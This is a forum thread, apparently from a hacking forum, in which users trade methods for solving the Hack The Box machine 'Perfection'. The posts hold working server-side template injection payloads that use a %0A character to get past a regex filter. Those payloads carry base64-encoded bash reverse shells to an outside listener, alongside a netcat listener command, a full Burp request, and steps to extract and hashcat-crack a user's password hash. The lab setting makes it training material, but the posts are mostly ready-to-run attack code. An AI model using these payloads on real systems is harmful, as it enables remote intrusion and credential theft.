Posts: 22
Threads: 5
Joined: Mar 2024
(Mar 05, 2024, 04:25 AM)K4dln Wrote: (Mar 02, 2024, 08:05 PM)jahman Wrote: You have to bypass a regex filter to execute SSTI RCE. You have to use the %0A char. here is a payload:
category1=a///A77ss/e%0A;<%25%3d+system("echo IyEvYmluL2Jhc2gK
YmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIxLzIyMjIgMD4mMSIK | base64 -d | bash")+%25>+
Then you have to find the susan hash password in the /home/susan/Migration/pupilpath_credentials.db file
strings /home/susan/Migration/pupilpath_credentials.db
The format of the password is in the /var/spool/mail/susan. You can crack it with hashcazt in mask mode:
hashcat -m 1400 h -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
Im listening (ip vpn h7b) nc -lvnp 4444
My Burp code
POST /weighted-grade-calc HTTP/1.1
Host: 10.129.217.20
Content-Length: 295
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.129.217.20
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.217.20/weighted-grade
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
grade1=12&weight1=12&category2=123&grade2=12&weight2=12&category3=khbj&grade3=12&weight3=12&category4=dfwdf&grade4=12&weight4=12&category5=sdfsd&grade5=12&weight5=0&category1=a%0A<%25%3dsystem("echo+YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzQ0NDQgMD4mMSI=+|+base64+-d+|+bash");%25>
But its dont work... WHYYYY???
Help me please
Check out this video: https://youtu.be/cQlb4C8WUG4
Also, you don't need to base64 encode your payload. You can wrap it backtick `payload`. make sure you url encode special characters. Also, you can use python3 payload.
Posts: 24
Threads: 1
Joined: Nov 2023
ok for burpsuite below command:
category1=Maths%0A<%25%3d+`ls+lh`+%25>&grade1=5&weight1=60&category2=english&grade2=50&weight2=fr&category3=chemistry&grade3=5&weight3=5&category4=5&grade4=5&weight4=5&category5=5&grade5=5&weight5=5
replace ls+lh for your command reverse shell after select your command and encode for url (Ctrl+U on keyboard)
Posts: 12
Threads: 1
Joined: Jan 2024
Mar 07, 2024, 10:02 PM
(This post was last modified: Mar 07, 2024, 10:04 PM by ballzach.)
Extremely thorough walkthrough covering literally every aspect of this box from A-Z!
... Shall I say... IT IS PERFECTION!! 
https://breachforums.cx/Thread-HTB-PERFE...ALKTHROUGH
https://rentry.co/HTB-Perfection-Walkthrough
^^ Free & open source paste bin. Formatted nicely using markdown.
I really spent 3 days on this trying to cover every aspect because I saw so many new-user and newbie hackers/pentesters posting so many basic questions in the main thread, which no one was explaining the methodology or reasoning behind.
I enjoy doing this too, because it helps me also.
If you can leave respect on here or whatever, please do if you find it useful.
Leave thoughts & notes, sorry it's late!
Posts: 119
Threads: 10
Joined: Jan 2024
(Mar 07, 2024, 10:02 PM)ballzach Wrote: Extremely thorough walkthrough covering literally every aspect of this box from A-Z!
... Shall I say... IT IS PERFECTION!!
https://breachforums.cx/Thread-HTB-PERFE...ALKTHROUGH
https://rentry.co/HTB-Perfection-Walkthrough
^^ Free & open source paste bin. Formatted nicely using markdown.
I really spent 3 days on this trying to cover every aspect because I saw so many new-user and newbie hackers/pentesters posting so many basic questions in the main thread, which no one was explaining the methodology or reasoning behind.
I enjoy doing this too, because it helps me also.
If you can leave respect on here or whatever, please do if you find it useful.
Leave thoughts & notes, sorry it's late!
Amazing. Thanks for sharing. Bravo
Posts: 31
Threads: 0
Joined: Sep 2023
(Mar 07, 2024, 10:02 PM)ballzach Wrote: Extremely thorough walkthrough covering literally every aspect of this box from A-Z!
... Shall I say... IT IS PERFECTION!!
https://breachforums.cx/Thread-HTB-PERFE...ALKTHROUGH
https://rentry.co/HTB-Perfection-Walkthrough
^^ Free & open source paste bin. Formatted nicely using markdown.
I really spent 3 days on this trying to cover every aspect because I saw so many new-user and newbie hackers/pentesters posting so many basic questions in the main thread, which no one was explaining the methodology or reasoning behind.
I enjoy doing this too, because it helps me also.
If you can leave respect on here or whatever, please do if you find it useful.
Leave thoughts & notes, sorry it's late!
dhamm this is soo coo! This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Scraping | Contact us via https://breachforums.rs/misc.php?action=help&hid=27 if you feel this is incorrect.
|
